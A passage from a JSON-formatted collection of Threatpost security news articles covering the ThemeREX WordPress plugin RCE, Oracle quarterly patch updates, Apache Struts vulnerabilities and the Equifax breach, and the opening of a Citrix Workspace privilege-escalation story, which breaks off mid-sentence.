Gutenberg, the touchpoints of that communication are known as endpoints. ThemeREX uses the \u201c~/includes/plugin.rest-api.php\u201d file to register an endpoint (\u201c/trx_addons/v2/get/sc_layout\u201d), which in turn calls the \u201ctrx_addons_rest_get_sc_layout\u201d function.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThis introduces an access-control problem, the researcher noted. In unpatched versions of ThemeREX, \u201cthere were no capability checks on this endpoint that would block users that were not administrators or currently signed in, so any user had the ability to call the endpoint regardless of capability,\u201d she explained. \u201cIn addition, there was no nonce check to verify the authenticity of the source.\u201d\n\nFurther down in the code, there\u2019s also a functionality used to get parameters from widgets that work with the Gutenberg plugin.\n\n\u201cThis is where the core of the remote code execution vulnerability was present,\u201d Chamberland wrote. \u201cThere were no restrictions on the PHP functions that could be used or the parameters that were provided as input. Instead, we see a simple if (function_exists($sc)) allowing for any PHP function to be called and executed.\u201d\n\nThe upshot of this is that adversaries can use various WordPress functions \u2013 for instance, in attacks in the wild, the \u201cwp_insert_user\u201d function was used to create administrative user accounts and take over sites, according to the research.\n\nThemeREX has now addressed the issue by completely removing the affected ~/plugin.rest-api.php file from the plugin \u2013 users should update to the latest version to stay protected.\n\nWordPress plugins continue to be a rich avenue of attack for cybercriminals. Last month, popular WordPress plugin Duplicator, which has more than 1 million active installations, [was discovered to have](<https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/>) an unauthenticated arbitrary file download vulnerability that was being attacked.\n\nAnd, earlier in February a critical flaw in a popular WordPress plugin that helps make websites compliant with the General Data Protection Regulation (GDPR) [was disclosed](<https://threatpost.com/critical-wordpress-plugin-bug-afflicts-700k-sites/152871/>); it could enable attackers to modify content or inject malicious JavaScript code into victim websites. It affected 700,000 sites.\n\n**_Interested in security for the Internet of Things and how 5G will change things? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n", "cvss3": {}, "published": "2020-03-10T20:30:36", "type": "threatpost", "title": "Popular ThemeREX WordPress Plugin Opens Websites to RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-03-10T20:30:36", "id": "THREATPOST:CEFF4DB144B2E463CD3FB46A8A93EEF8", "href": "https://threatpost.com/themerex-wordpress-plugin-remote-code-execution/153592/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-01-23T05:28:22", "description": "Oracle patched 250 vulnerabilities across hundreds of different products as part of its [quarterly Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) released today.\n\nRounding out the list of products with the most patches is Oracle Fusion Middleware with 38, Oracle Hospitality Applications with 37 and Oracle MySQL with 25.\n\nOf the critical patches, security researchers at Onapsis said that they identified three high-risk SQL injections vulnerabilities in Oracle\u2019s popular Oracle E-Business Suite (EBS).\n\n\u201cWhile all three are high-risk vulnerabilities, one (CVE-2017-10332) is very easy to exploit,\u201d said JP Perez-Etchegoyen, CTO of Onapsis.\n\nOnapsis is warning users of Oracle EBS (versions 12.1 and 12.2) that they are exposed to SQL injection vulnerabilities that could allow an attacker, over a network without any username and password credentials, to potentially gain access to and modify critical documents and information such as credit card data, customer information, HR documents or financial records.\n\nPerez-Etchegoyen said each of the SQL injection vulnerabilities can easily be exploited by attackers who can disrupt, exfiltrate or manipulate data that is part of a business\u2019 enterprise resource planning, supply chain management or finance management systems.\n\n\u201cThese vulnerabilities are especially risky as an attacker would only need a web browser and network access to the EBS system HTTP interface to perform it,\u201d Perez-Etchegoyen said.\n\nOnapsis said vulnerabilities found in Oracle\u2019s EBS are on the rise, with a 29 percent increase in 2017 compared to the previous year.\n\nThe[ patches come](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) just weeks after Oracle OpenWorld where Larry Ellison, co-founder, executive chairman and chief technology officer of Oracle, stressed the importance of security during his keynote. Ellison also used the occasion to stress the importance of software patching in light of the [recent Equifax breach](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>).\n\nLast month, Oracle used an advisory as an opportunity to remind users that [in April it ](<https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/>)fixed the Struts vulnerability (CVE-2017-5638) which was behind [Equifax\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>),\n\nOrganizations are falling down when it comes to patching their most important business-critical applications, Perez-Etchegoyen said.\n\nCiting a recent Ponemon Research study, Perez-Etchegoyen said fewer than half of the 600 respondents interviewed said they have a monthly plan to implement security patches for their Oracle EBS applications. Seventy percent believe it is likely their company would have a data breach due to insecure Oracle EBS applications that they have failed to secure or apply patches to.\n\nAlso part of Oracle\u2019s quarterly update are patches for its Java Platform, Standard Edition that received 22 new security fixes. Twenty of these vulnerabilities may be remotely exploitable without authentication, for example, they may be exploited over a network without requiring user credentials, Oracle said. The highest CVSS base score of vulnerabilities affecting Oracle Java SE is 9.6.\n\nImpacted are Java Advanced Management Console, Java SE, Java SE Embedded and JRockit.\n\nOracle Database Server received six security fixes with two of the vulnerabilities remotely exploitable without authentication. Affected Oracle Database Server components include Spatial (Apache Groovy), WLM (Apache Tomcat), Java VM, RDBMS Security, Core RDBMS and XML Database.\n", "cvss3": {}, "published": "2017-10-17T18:13:09", "type": "threatpost", "title": "Oracle Patches 250 Bugs in Quarterly Critical Patch Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10332", "CVE-2017-5638"], "modified": "2017-10-17T18:13:09", "id": "THREATPOST:0308A7143D92E14583CCD684912ABD67", "href": "https://threatpost.com/oracle-patches-250-bugs-in-quarterly-critical-patch-update/128484/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:48", "description": "Oracle released its biggest [Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html>) ever on Tuesday, and with it came added urgency in the form of patches for the Solaris vulnerabilities exposed by the [ShadowBrokers](<https://threatpost.com/shadowbrokers-expose-nsa-access-to-swift-service-bureaus/124996/>) last week, as well as the recent [Apache Struts 2 vulnerability](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), also under public attack.\n\nIn all, Oracle admins have a tall order with 299 patches across most of the company\u2019s product lines; 162 of the vulnerabilities are remotely exploitable.\n\nTwo Solaris exploits were leaked by the mysterious ShadowBrokers last Friday. The Solaris attacks were included among a rash of other exploits including a laundry list of Windows attacks, many of which had [already been patched by Microsoft](<https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/>) prior to last Friday\u2019s dump.\n\nOne of the Solaris vulnerabilities, code-named EBBISLAND, had been patched in a number of updates dating back to 2012. The other, EXTREMEPARR, was addressed on Tuesday. It affects Solaris 7-10 on x86 and SPARC architectures, and is a local privilege escalation issue in the [dtappgather](<https://github.com/HackerFantastic/Public/blob/master/exploits/dtappgather-poc.sh>) component. Oracle patched versions 10 and 11.3 on Tuesday.\n\nResearcher Matthew Hickey of U.K. consultancy Hacker House, said the EXTREMEPARR attacks go back to Solaris 7, while EBBISLAND affects Solaris 6-10, and is a remote RPC services exploit. Both exploits allow attackers to elevate privileges to root and run shells on a compromised server.\n\n> I said in December that EBBISLAND was likely an exploit for Solaris 6 through 10, I am today confirmed correct (upto 9, still untested) <https://t.co/A3fC7BuwcK>\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 8, 2017](<https://twitter.com/hackerfantastic/status/850802122224488452>)\n\n\u201cAs a security researcher it was an extremely interesting find to discover such well written exploits in a public data dump,\u201d Hickey wrote in a [report](<https://www.myhackerhouse.com/easter-egg-hunt_greetz/#sthash.YMmAy8Ez.dpuf>) published today, \u201ceven though the bug was a trivial path traversal for \u2018dtappgather\u2019 extensive steps had been taken to protect the attack specifics in the binary and a well tested tool which worked flawlessly on all tested hosts was included.\u201d\n\nSince last August, the ShadowBrokers have periodically released tools belonging to the Equation Group, widely believed to be the U.S. National Security Agency. The Solaris attacks are of particular concern since these are the backbone of many enterprise-grade server environments.\n\n> The NSA had the power to hack any Oracle Solaris box in the world via UDP/TCP generically with anti-forensics capabilities and its public.\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 10, 2017](<https://twitter.com/hackerfantastic/status/851561358516736000>)\n\n\u201cThis vulnerability can be exploited remotely without authentication or any information about the targeted machine,\u201d said Amol Sarwate, director of [Qualys Vulnerability Labs](<https://blog.qualys.com/laws-of-vulnerabilities/2017/04/18/oracle-plugs-struts-hole-along-with-299-total-vulnerabilities>). \u201cThese are very critical vulnerabilities.\u201d\n\nThe [Apache Struts 2 vulnerability](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>) has been public since early March, though it\u2019s been publicly exploited for much longer. The flaw is in the Jakarta Multipart parser in Struts 2 2.3 before 2.3.32 and in 2.5 before 2.5.10.1. A remote attacker could upload a malicious Content-Type value and have it execute. Public scans and attacks ramped up immediately upon disclosure of the issue and development of a Metasploit module. For the most part, Linux-based DDoS bots were behind most of the exploit attempts, but a spate of attacks were detected attempting to install [Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable Windows servers.\n\nOracle patched Struts 2 on 25 of its products, including 19 different instances of its Oracle Financial Services Applications. Most of these Oracle applications, however, are not internet-facing and live behind an enterprise firewall.\n\n\u201cThat could be a little bit of a saving grace for some of these services,\u201d Qualys\u2019 Sarwate said. There could be some instances, however, where these apps are exposed to the public network for remote administration purposes, for example. There are also some cases in which admins may be learning for the first time that Struts 2 is running inside an Oracle product. \u201cFor a normal admin, it could be a little difficult unless a vendor tells them these are the products you\u2019re running that are affected by the Struts 2 vulnerability. It could take some admins by surprise.\u201d\n\nWhile there were 47 patches in total for the financial applications suite, the MySQL database also received a hefty load of 39 fixes, 11 of which are remotely exploitable without authentication. The Oracle Retail Applications suite also had 39 vulnerabilities addressed, 32 of which were remotely exploitable. Oracle Fusion Middleware received 31 patches, 20 of which were for remotely exploitable vulnerabilities.\n\nThe previous record for quarterly Oracle patches was last July when [276 patches](<https://threatpost.com/oracle-patches-record-276-vulnerabilities-with-july-critical-patch-update/119373/>) were released; January\u2019s update, the first for 2017, had [270 patches](<https://threatpost.com/oracle-patches-270-vulnerabilities-in-years-first-critical-patch-update/123155/>).\n", "cvss3": {}, "published": "2017-04-19T07:20:09", "type": "threatpost", "title": "Record Oracle Patch Update Addresses ShadowBrokers, Struts 2 Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2017-04-21T19:31:17", "id": "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "href": "https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:11", "description": "The Apache Software Foundation has patched a critical remote code execution vulnerability affecting all versions of the popular application development framework Struts since 2008.\n\nAll web applications using the framework\u2019s REST plugin are vulnerable. Users are advised to upgrade their Apache Struts components as a matter of urgency, according to Semmle, a software engineering analytics firm that first identified the bug.\n\n\u201cThis particular vulnerability allows a remote attacker to execute arbitrary code on any server running an application built using the Struts framework and the popular REST communication plugin. The weakness is caused by the way Struts deserializes untrusted data,\u201d the company wrote in [a technical write-up](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) on the vulnerability published on Tuesday in coordination with the release of a patch by Apache Software Foundation (ASF).\n\n\u201cThis is as serious as it gets; if remote attackers are allowed to exploit the newly identified vulnerability it can critically damage thousands of enterprises,\u201d said Oege de Moor, CEO and founder of Semmle.\n\nAffected developers are urged to [upgrade to Apache Struts version 2.5.13](<https://struts.apache.org/announce.html#a20170905>).\n\nThe ASF said there is no workaround available for the vulnerability ([CVE-2017-9805](<https://struts.apache.org/docs/s2-052.html>)) in Struts, an open-source framework for developing web applications in the Java programming language.\n\n\u201cThe best option (sans an upgrade) is to remove the Struts REST plugin when not used or limit it to server normal pages and JSONs only,\u201d the ASF wrote in a [security bulletin issued Tuesday](<https://struts.apache.org/docs/s2-052.html>).\n\nSemmle cites estimates the vulnerability could impact 65 percent of the Fortune 100 companies that use web applications built with the Struts framework.\n\n\u201cOrganizations like Lockheed Martin, the IRS, Citigroup, Vodafone, Virgin Atlantic, Reader\u2019s Digest, Office Depot, and Showtime are known to have developed applications using the framework. This illustrates how widespread the risk is,\u201d Semmle researcher Bas van Schaik wrote Tuesday, citing estimates by analysts at the software developer research firm RedMonk.\n\nMultiple similar vulnerabilities have been reported tied to Struts. Earlier this year, attackers were exploiting a critical Apache Struts vulnerability on Windows servers and dropping Cerber ransomware on the machines.\n\n[In March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), public attacks and scans looking for exposed Apache webservers were reportedly on the rise after a vulnerability ([CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>)) in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.\n\nSemmle said this most recent vulnerability is caused by the way Struts deserializes untrusted data. Deserialization is the processes of taking structured data from one format and rebuilding it into an object. The processes can be tweaked for malicious intent and has been used in a host of attack scenarios including denial-of-service, access control and remote code execution attacks.\n\nThe remote code execution attack Semmle identified is possible when using the Struts REST plugin with the XStream handler to facilitate XML payloads. XStream is a Java library used to serialize objects to XML (or JSON) and back again.\n\n\u201cLgtm (Semmle\u2019s open-source [code analysis tool](<https://lgtm.com/>)) identifies alerts in code using queries written in a specially-designed language: QL. One of the many queries for Java detects potentially unsafe deserialization of user-controlled data. The query identifies situations in which unsanitized data is deserialized into a Java object. This includes data that comes from an HTTP request or from any other socket connection,\u201d Semmle said in a [second technical analysis of the vulnerability](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) posted Tuesday.\n\nData contained in one of the arguments (toObject) should be considered \u201ctainted\u201d and \u201cunder the control of a remote user and should not be trusted.\u201d This query detects common ways through which user-controlled data flows to a deserialization method, researchers said. \u201cHowever, some projects use a slightly different approach to receive remote user input,\u201d they said.\n\nSemmle said it has developed a \u201csimple\u201d working exploit for this vulnerability but currently has no plans to disclose it.\n\n\u201cThere is no suggestion that an exploit is publicly available, but it is likely that one will soon be,\u201d van Schaik wrote in a blog post.\n", "cvss3": {}, "published": "2017-09-05T14:10:54", "type": "threatpost", "title": "Patch Released for Critical Apache Struts Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-05T18:44:40", "id": "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "href": "https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:10", "description": "Equifax said the culprit behind [this summer\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) was indeed CVE-2017-5638, an Apache Struts vulnerability patched back in March.\n\nThe bug was widely assumed by experts to be the \u201cU.S. website application vulnerability\u201d implicated by the company last Thursday, especially after an Apache spokeswoman [told Reuters](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) on Friday that it appeared the consumer credit reporting agency hadn\u2019t applied patches for flaws discovered earlier this year.\n\nOn Wednesday company specified the flaw in a statement [posted to its site](<https://www.equifaxsecurity2017.com/>) and stressed it was continuing to work alongside law enforcement to investigate the incident.\n\n> \u201cEquifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\u201d\n\nUntil the news broke on Wednesday there was still mounting confusion over which Struts vulnerability attackers used.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, [wrote in open letter over the weekend](<https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/>) that attackers either used an unknown Struts zero day or an earlier announced vulnerability. A separate remote code execution bug, CVE-2017-9805, was fixed in Struts [last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) but Gielen said the Apache PMC would have known about it if it was being exploited in July.\n\nAn internal report last week from equity research firm Baird said a Struts vulnerability was behind the breach as well. The analyst who penned the report failed to specify which vulnerability and neglected to state how he arrived at that conclusion however.\n\nJeff Williams, chief technology officer of Contrast Security, wrote last Saturday that CVE-2017-5638 was likely to blame for the breach.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Williams wrote, adding on Thursday that he was familiar with several large organizations which took months to fix the bug.\n\n\u201cThe process of rewriting, retesting, and redeploying can take months. I just visited one of the largest telecom providers where this effort took more than four months and millions of dollars. Without runtime protection in place, they have to do this every time a new library vulnerability comes out,\u201d Williams said.\n\nThe vulnerability, a flaw in the Jakarta Multipart parser upload function in Apache, allowed an attacker to make a maliciously crafted request to an Apache webserver. The vulnerability, which first surfaced on Chinese forums before it was discovered by researchers with Cisco Talos, [was patched back in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>) but proof of concept exploit code quickly found its way into Metasploit. Public scans and attacks spiked immediately following disclosure of the vulnerability and at least one campaign was found [installing Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable servers.\n\nFamed cryptographer Bruce Schneier, CTO of IBM Resilient, [weighed in](<https://www.schneier.com/blog/archives/2017/09/on_the_equifax_.html>) on the Equifax fiasco on Wednesday and like IoT issues as of late [have necessitated](<https://threatpost.com/legislation-proposed-to-secure-connected-iot-devices/127152/>), suggested the only solution to preventing breaches like this from happening again is government intervention.\n\n\u201cBy regulating the security practices of companies that store our data, and fining companies that fail to comply, governments can raise the cost of insecurity high enough that security becomes a cheaper alternative,\u201d Schneier wrote, \u201cThey can do the same thing by giving individuals affected by these breaches the ability to sue successfully, citing the exposure of personal data itself as a harm.\u201d\n\nFittingly, as if to get the ball rolling, on Wednesday U.S. Sen. Mark Warner (D-VA) asked the Federal Trade Commission to look into the breach and the company\u2019s security practices, namely whether Equifax has adequate cybersecurity safeguards in place for the amount of personally identifiable information it deals with.\n\n\u201cThe volume and sensitivity of the data potentially involved in this breach raises serious questions about whether firms like Equifax adequately protect the enormous amounts of sensitive data they gather and commercialize,\u201d [Warner wrote](<https://www.scribd.com/document/358810691/Sen-Warner-Asks-FTC-to-Probe-Equifax>), \u201cIn ways similar to the financial service industry\u2019s systemic risk designation, I fear that firms like Equifax may illustrate a set of institutions whose activities, left unchecked, can significantly threaten the economic security of Americans.\u201d\n\nThe letter came a few days after members of the U.S. Senate Finance Committee, including Sen. Orrin Hatch (R-UT) and Ron Wyden (D-Ore.) sent another letter to Equifax CEO Richard Smith asking for additional information about the breach.\n\n\u201cThe scope and scale of this breach appears to make it one of the largest on record, and the sensitivity of the information compromised may make it the most costly to taxpayers and consumers,\u201d the senators wrote in a [letter](<https://www.finance.senate.gov/download/91117-equifax-release>) on Monday.\n\nWhile the FTC doesn\u2019t typically comment on ongoing investigations the Commission did confirm Thursday afternoon because of the \u201cintense public interest\u201d and \u201cpotential impact of this matter,\u201d it was looking into the breach.\n\nEquifax said Americans and an undisclosed number of Canadian and United Kingdom residents were affected by the breach but security news site [KrebsonSecurity.com](<https://krebsonsecurity.com/2017/09/ayuda-help-equifax-has-my-data/>) said this week Argentinans may be implicated as well. Brian Krebs, who authors the site, claims he was contacted by Alex Holden, who runs the firm Hold Security, earlier this week. Two of Holden\u2019s employees, native Argentinans, discovered an Equifax portal for employees in Argentina that included their names, email addresses, and DNI \u2013 the Argentinian equivalent of a Social Security Number.\n\nThe site, according to Holden \u201cwas wide open, protected by perhaps the most easy-to-guess password combination ever: \u201cadmin/admin.\u201d Krebs claims the portal was disabled upon notifying Equifax\u2019s attorney and that the company is looking into how it may have been left unsecured.\n", "cvss3": {}, "published": "2017-09-14T16:00:34", "type": "threatpost", "title": "Equifax Confirms March Struts Vulnerability Behind Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-15T13:01:13", "id": "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "href": "https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:10", "description": "A group of developers behind Apache Struts, believed by some to be the culprit behind [last week\u2019s Equifax breach](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>), took umbrage with those claims over the weekend.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, wrote Saturday that if Struts was targeted, it\u2019s unclear which vulnerability, if any was exploited.\n\n[The letter,](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>) which was written on behalf of the Struts PMC, was spurred by an internal analyst report published last week that suggested data from Equifax\u2019s servers was breached via an unnamed Apache Struts flaw.\n\nThe report penned by Jeffrey Meuler, a senior research analyst with Baird Equity Research, the research arm of the financial services firm Robert W. Baird & Co, did not provide a source for the finding. Meuler did not immediately return a request for further comment when contacted on Monday.\n\nGielen\u2019s letter took particular issue with a Quartz.com article that initially alleged CVE-2017-9805, a critical remote code execution vulnerability that the ASF [patched last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), was the Struts vulnerability to blame for the breach of 143 million Americans\u2019 records. The [Quartz article](<https://qz.com/1073221/the-hackers-who-broke-into-equifax-exploited-a-nine-year-old-security-flaw/>) \u2013 since edited \u2013 initially claimed that CVE-2017-9805 had existed in the wild for nine years, something Gielen had a hard time buying. Gielen said Saturday that since the breach was detected back in July, it\u2019s likely the Equifax attackers either used an unknown Struts zero day or an earlier announced vulnerability on an unpatched Equifax server.\n\nGielen says the ASF takes \u201cenormous efforts\u201d to secure software it produces, like Struts, and makes a conscious effort to hold back sensitive information around vulnerabilities. There is no silver bullet for preventing exploits from surfacing in the wild however.\n\n\u201cSince vulnerability detection and exploitation has become a professional business, it is and always will be likely that attacks will occur even before we fully disclose the attack vectors, by reverse engineering the code that fixes the vulnerability in question or by scanning for yet unknown vulnerabilities.\u201d\n\nIf the attackers had used CVE-2017-9805, it would have been considered a zero day at the time, but according to Gielen, the Apache PMC was only recently notified of the vulnerability \u2013 something it quickly remedied.\n\n\u201cWe were notified just recently on how a certain piece of code can be misused, and we fixed this ASAP,\u201d Gielen said, \u201cWhat we saw here is common software engineering business \u2014 people write code for achieving a desired function, but may not be aware of undesired side-effects. Once this awareness is reached, we as well as hopefully all other library and framework maintainers put high efforts into removing the side-effects as soon as possible. It\u2019s probably fair to say that we met this goal pretty well in case of CVE-2017-9805.\u201d\n\nGielen concluded his letter with a series of best practices for businesses who use Apache Struts to follow, including being aware which framework/libraries are used in their setup, that processes to roll out security fixes are established, and perhaps most importantly, to understand that complex software can contain flaws.\n\nAn Apache spokeswoman [told Reuters on Friday](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) that it appeared Equifax had not applied patches for flaws discovered this year.\n\nIt\u2019s unclear exactly which vulnerability the spokeswoman was referring to. The Struts vulnerability fixed last week affected all web apps that used the framework\u2019s REST plugin. Another Struts vulnerability, CVE-2017-5638, was publicized and incorporated into Metasploit [in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>). That flaw stemmed from Struts\u2019 Jakarta Multipart parser upload functionality and allowed an attacker to execute requests to an Apache webserver. Researchers with Cisco Talos, [who found the bug](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>), said it was being exploited in the wild when it was disclosed.\n\nResearchers with Contrast Security posit it\u2019s more likely the attacker used CVE-2017-5638, an expression language injection vulnerability leveraged via the content-type header, to hit Equifax.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Jeff Williams, Contrast\u2019s co-founder and chief technology officer, [wrote Saturday](<https://www.contrastsecurity.com/security-influencers/a-week-of-web-application-hacks-and-vulnerabilities>).\n\nWilliams echoed a few sentiments made by Gielen, including the fact that maintaining the security of libraries can be tricky but should remain a focus for businesses.\n\n\u201cKeeping libraries up to date isn\u2019t a small amount of work, as these changes come out frequently. Often these changes require rewriting, retesting, and redeploying the application, which can take months. I have recently talked with several large organizations that took over four months to deal with CVE-2017-5638,\u201d Williams said.\n\nEquifax, which has yet to respond to a request for comment for this article or [previous](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) [articles](<https://threatpost.com/many-questions-few-answers-for-equifax-breach-victims/127886/>), remains in damage control mode.\n\nThe company on Monday said it would be changing how it generates PINs for customers who want to initiate a security freeze on their accounts. The response was presumably in response to a series of tweets that went viral on Friday night calling out Equifax for using hardcoded PINs that mirrored the date and time they were requested, a format the company allegedly has followed for more than a decade.\n\n> OMG, Equifax security freeze PINs are worse than I thought. If you froze your credit today 2:15pm ET for example, you'd get PIN 0908171415.\n> \n> \u2014 Tony Webster (@webster) [September 9, 2017](<https://twitter.com/webster/status/906346071210778625>)\n\nThe company said in an update to its site that going forward consumers placing a security freeze will be given a randomly generated PIN. Users who previously froze their credit will have to mail the company directly to change it, however.\n\n> Equifax's security freeze system is now generating random PINs. If you already got one though, you have to MAIL them to change it. Fail. [pic.twitter.com/fOrtvgkmGd](<https://t.co/fOrtvgkmGd>)\n> \n> \u2014 Tony Webster (@webster) [September 11, 2017](<https://twitter.com/webster/status/907242378829889537>)\n\nThe company on Monday also apologized for lengthy call center wait times and stressed that users who sign up for TrustedID Premier, the company\u2019s ID theft protection and credit monitoring service, will not be charged as soon as the year runs out.\n\nThe company also took a moment on Monday to reiterate that signing up for the free credit monitoring service doesn\u2019t waive a consumer\u2019s right to take legal action.\n\nThe company clarified its TrustedID Premier policy on Friday afternoon after it was pressed repeated by consumers and politicians alike. One politician in particular, Eric Schneiderman, New York\u2019s Attorney General, opened a formal investigation into the breach on Friday, calling out the company\u2019s arbitration clause policy.\n\nAs expected multiple lawsuits have been filed against the company in wake of the breach. One class action suit, filed late Thursday night, alleges Equifax \u201cnegligently failed to maintain adequate technological safeguards to protect [the plaintiffs\u2019] information from unauthorized access by hackers.\u201d The suit seeks as much as $70 billion in damages nationally.\n\n\u201cEquifax knew and should have known that failure to maintain adequate technological safeguards would eventually result in a massive data breach,\u201d the complaint also reads.\n\n_*This article was updated at 5 p.m. to include insight from Contrast Security re: CVE-2017-5638 and Equifax._\n", "cvss3": {}, "published": "2017-09-11T15:02:31", "type": "threatpost", "title": "Apache Foundation Refutes Involvement in Equifax Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-20T19:57:18", "id": "THREATPOST:477B6029652B76463B5C5B7155CDF736", "href": "https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-14T22:13:24", "description": "A Citrix Workspace vulnerability that was fixed in July has been found to have a secondary attack vector, which would allow cybercriminals to elevate privileges and remotely execute arbitrary commands under the SYSTEM account.\n\nThe bug (CVE-2020-8207), exists in the automatic update service of the Citrix Workspace app for Windows. It could allow local privilege-escalation as well as remote compromise of a computer running the app when Windows file sharing (SMB) is enabled, according to the [Citrix advisory](<https://support.citrix.com/article/CTX277662>).\n\nThe bug, though mostly fixed over the summer, was recently found to still allow attackers to abuse Citrix-signed MSI installers, according to Pen Test Partners (MSI is the filename extension of Windows Installer packages). This turns the bug into a remote command-line injection vulnerability.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe update service [originally relied](<https://www.pentestpartners.com/security-blog/raining-system-shells-with-citrix-workspace-app/>) on a faulty file hash within a JSON payload to determine if an update should proceed or not \u2013 allowing attackers to download their own code by exploiting the weak hash. To fix the problem, the latest update catalogs are now directly downloaded from the Citrix update servers, and the service \u201ccross-references the hashes with the file that is requested for install from the UpdateFilePath attribute,\u201d wrote researchers at Pen Test Partners, in a [Monday posting](<https://www.pentestpartners.com/security-blog/the-return-of-raining-system-shells-with-citrix-workspace-app/>).\n\n\u201cIf the update file is signed, valid and the hash of the update file matches one of the files within the manifest, the update file is executed to perform the upgrade,\u201d they explained.\n\nHowever, the patch didn\u2019t prevent remote connectivity to limit the attack surface.\n\n\u201cThe catalog includes executables and MSI files for installation,\u201d according to the firm. \u201cMSI files on the other hand cannot be executed in the same way as executable files, therefore the update service must handle these 